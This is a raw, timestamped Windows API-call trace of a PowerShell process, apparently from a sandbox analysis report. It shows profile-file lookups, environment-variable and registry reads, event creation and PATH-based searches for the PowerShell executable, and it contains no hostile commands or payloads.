	[0569.426] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed580 | out: lpFileInformation=0x1ed580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0569.427] SetErrorMode (uMode=0x1) returned 0x1
	[0569.427] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0569.427] SetErrorMode (uMode=0x1) returned 0x1
	[0569.427] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed580 | out: lpFileInformation=0x1ed580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0569.427] SetErrorMode (uMode=0x1) returned 0x1
	[0569.428] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0569.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.428] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0569.428] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0569.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.428] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0569.428] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0569.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.429] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0569.429] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0569.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.429] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0570.839] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0570.839] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.839] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0570.840] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x314
	[0570.841] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x2dc
	[0570.841] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x398
	[0570.841] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
	[0570.841] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1c8
	[0570.841] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x328
	[0570.841] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0570.841] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0570.841] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x334
	[0570.841] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x338
	[0570.841] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0570.841] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x39c
	[0570.844] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0570.844] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.844] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0570.847] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0570.848] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1ed760 | out: lpMode=0x1ed760) returned 1
	[0570.849] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0570.849] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.849] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0570.854] SetEvent (hEvent=0x304) returned 1
	[0570.854] SetEvent (hEvent=0x314) returned 1
	[0570.854] SetEvent (hEvent=0x2dc) returned 1
	[0570.854] SetEvent (hEvent=0x398) returned 1
	[0570.854] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0570.857] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0570.857] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.857] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0570.858] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed4b8 | out: phkResult=0x1ed4b8*=0x350) returned 0x0
	[0570.858] RegQueryValueExW (in: hKey=0x350, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1ed43c, lpData=0x0, lpcbData=0x1ed438*=0x0 | out: lpType=0x1ed43c*=0x0, lpData=0x0, lpcbData=0x1ed438*=0x0) returned 0x2

Thread:
	id = 283
	os_tid = 0xe04


Thread:
	id = 286
	os_tid = 0xe2c


Thread:
	id = 783
	os_tid = 0xc28


Thread:
	id = 789
	os_tid = 0xb74


Thread:
	id = 796
	os_tid = 0x1498


Thread:
	id = 809
	os_tid = 0x108c


Thread:
	id = 810
	os_tid = 0x1084

	[0460.187] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0513.188] LocalFree (hMem=0x3472c0) returned 0x0
	[0513.188] CloseHandle (hObject=0x1c8) returned 1
	[0513.188] CloseHandle (hObject=0x13) returned 1
	[0513.189] CloseHandle (hObject=0xf) returned 1
	[0513.190] RegCloseKey (hKey=0x304) returned 0x0
	[0513.190] RegCloseKey (hKey=0x300) returned 0x0
	[0513.190] RegCloseKey (hKey=0x2fc) returned 0x0
	[0513.190] LocalFree (hMem=0x347290) returned 0x0
	[0513.191] RegCloseKey (hKey=0x324) returned 0x0
	[0526.864] RegCloseKey (hKey=0x2dc) returned 0x0
	[0535.418] RegCloseKey (hKey=0x2dc) returned 0x0
	[0553.080] RegCloseKey (hKey=0x394) returned 0x0
	[0553.080] RegCloseKey (hKey=0x390) returned 0x0
	[0553.080] RegCloseKey (hKey=0x36c) returned 0x0
	[0553.080] RegCloseKey (hKey=0x3a8) returned 0x0
	[0553.081] RegCloseKey (hKey=0x388) returned 0x0
	[0553.081] RegCloseKey (hKey=0x384) returned 0x0
	[0553.081] RegCloseKey (hKey=0x380) returned 0x0
	[0553.081] RegCloseKey (hKey=0x37c) returned 0x0
	[0553.082] RegCloseKey (hKey=0x378) returned 0x0
	[0553.082] RegCloseKey (hKey=0x374) returned 0x0
	[0553.082] RegCloseKey (hKey=0x370) returned 0x0
	[0553.082] RegCloseKey (hKey=0x348) returned 0x0
	[0553.082] RegCloseKey (hKey=0x3a4) returned 0x0
	[0553.083] RegCloseKey (hKey=0x3a0) returned 0x0
	[0553.083] RegCloseKey (hKey=0x368) returned 0x0
	[0553.083] RegCloseKey (hKey=0x364) returned 0x0
	[0553.083] RegCloseKey (hKey=0x360) returned 0x0
	[0553.084] RegCloseKey (hKey=0x35c) returned 0x0
	[0553.084] RegCloseKey (hKey=0x358) returned 0x0
	[0553.084] RegCloseKey (hKey=0x354) returned 0x0
	[0553.084] RegCloseKey (hKey=0x350) returned 0x0
	[0553.085] RegCloseKey (hKey=0x34c) returned 0x0
	[0553.085] RegCloseKey (hKey=0x39c) returned 0x0
	[0553.085] RegCloseKey (hKey=0x33c) returned 0x0
	[0553.086] RegCloseKey (hKey=0x338) returned 0x0
	[0553.086] RegCloseKey (hKey=0x334) returned 0x0
	[0553.086] RegCloseKey (hKey=0x330) returned 0x0
	[0553.086] RegCloseKey (hKey=0x32c) returned 0x0
	[0553.087] RegCloseKey (hKey=0x328) returned 0x0
	[0553.087] RegCloseKey (hKey=0x1c8) returned 0x0
	[0553.087] RegCloseKey (hKey=0x304) returned 0x0
	[0553.087] RegCloseKey (hKey=0x398) returned 0x0
	[0553.087] RegCloseKey (hKey=0x2dc) returned 0x0
	[0593.770] RegCloseKey (hKey=0x350) returned 0x0

Thread:
	id = 906
	os_tid = 0x182c


Thread:
	id = 1142
	os_tid = 0xd2c

	[0572.493] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0572.501] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0572.507] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0572.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0572.507] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0572.510] VirtualQuery (in: lpAddress=0x1c7ed740, lpBuffer=0x1c7ee600, dwLength=0x30 | out: lpBuffer=0x1c7ee600*(BaseAddress=0x1c7ed000, AllocationBase=0x1be60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0572.514] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0572.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0572.514] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0572.517] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0572.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0572.517] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0572.520] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0572.521] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0572.521] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0574.086] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0574.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0574.086] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0574.089] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0574.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0574.089] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0574.090] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0574.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0574.090] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0574.095] VirtualQuery (in: lpAddress=0x1c7ed9f0, lpBuffer=0x1c7ee8b0, dwLength=0x30 | out: lpBuffer=0x1c7ee8b0*(BaseAddress=0x1c7ed000, AllocationBase=0x1be60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0574.096] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0574.096] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0574.096] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0574.124] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0574.124] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0574.124] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0574.125] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0574.125] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0574.125] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0574.126] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0574.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0574.126] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0574.131] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0574.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0574.131] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0575.536] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0575.536] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0575.536] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0575.538] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0575.538] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0575.538] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0575.539] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0575.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0575.539] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0575.542] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0575.542] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0575.542] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0575.543] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0575.543] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0575.543] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0575.545] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0575.545] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0575.545] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0575.547] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0575.547] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0575.547] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0577.064] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0577.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0577.064] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0578.928] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0578.928] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0578.928] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0578.931] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0578.931] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0578.931] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0578.931] CoTaskMemAlloc (cb=0x128) returned 0x33e620
	[0578.931] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x33e620, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0578.931] CoTaskMemFree (pv=0x33e620) 
	[0578.935] CoTaskMemAlloc (cb=0x20e) returned 0x1b6e25e0
	[0578.935] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b6e25e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0578.936] CoTaskMemFree (pv=0x1b6e25e0) 
	[0578.939] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0580.652] SetErrorMode (uMode=0x1) returned 0x1
	[0580.654] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.667] SetErrorMode (uMode=0x1) returned 0x1
	[0580.669] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0580.669] SetErrorMode (uMode=0x1) returned 0x1
	[0580.669] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.677] SetErrorMode (uMode=0x1) returned 0x1
	[0580.678] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0580.678] SetErrorMode (uMode=0x1) returned 0x1
	[0580.678] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.687] SetErrorMode (uMode=0x1) returned 0x1
	[0580.688] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0580.689] SetErrorMode (uMode=0x1) returned 0x1
	[0580.689] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0580.697] SetErrorMode (uMode=0x1) returned 0x1
	[0582.413] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0582.413] SetErrorMode (uMode=0x1) returned 0x1
	[0582.413] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0582.421] SetErrorMode (uMode=0x1) returned 0x1
	[0582.422] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0582.422] SetErrorMode (uMode=0x1) returned 0x1
	[0582.423] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0582.431] SetErrorMode (uMode=0x1) returned 0x1
	[0582.432] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0582.432] SetErrorMode (uMode=0x1) returned 0x1
	[0582.432] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0582.440] SetErrorMode (uMode=0x1) returned 0x1
	[0582.442] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0582.442] SetErrorMode (uMode=0x1) returned 0x1
	[0582.442] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0583.917] SetErrorMode (uMode=0x1) returned 0x1
	[0583.919] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0583.919] SetErrorMode (uMode=0x1) returned 0x1
	[0583.919] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0583.927] SetErrorMode (uMode=0x1) returned 0x1
	[0583.929] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0583.929] SetErrorMode (uMode=0x1) returned 0x1
